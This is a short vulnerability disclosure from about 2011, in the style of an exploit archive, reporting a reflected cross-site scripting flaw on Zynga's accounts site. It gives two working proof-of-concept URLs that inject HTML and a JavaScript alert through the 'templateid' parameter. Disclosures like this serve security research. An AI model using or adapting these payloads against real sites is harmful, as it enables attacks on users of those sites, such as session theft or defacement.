_______ ________________ __ _____________ _______ \ _ \ \ _ \______ \ | _/_ \______ \ __ _ __ \_ __ \/ /_\ \/ /_\ \ / / |/ /| | / / ______ \ \/ \/ / | | \/\ \_/ \ \_/ \/ /| < | | / / /_____/ \ / |__| \_____ /\_____ /____/ |__|_ \|___| /____/ \/\_/ \/ \/ \/ ------------------------------------------------------------------------------------------------------------------------------------------------- Title: Zynga (accounts)Cross site scripting vulnerability vendor: www.zynga.com Author: Raghavendra Karthik D (r007k17-w) Email: n4gb07@gmail.com My blog: http://shadowrootkit.wordpress.com/ Google Dork:© 2011 Zynga, Inc -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- * Cross Site Scripting vulnerability Demo: 1.HTML injection: http://accounts.zynga.com/?game=&unsub=11046&templateid=%22%3E%3Cfont%20size=22%20name=calibri%3EXSS%20BUG%20DETECTED!!%20%3C/font%3E 2.JavaScript injection: http://accounts.zynga.com/?game=&unsub=11046&templateid=%22%3E%3Cscript%3Ealert%28%22XSSed_by_Raghavendra_Karthik_D%22%29%3C/script%3E ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- gr33t1ngs to s1d3-3ff3cts and 3psilonlambda and all my friends.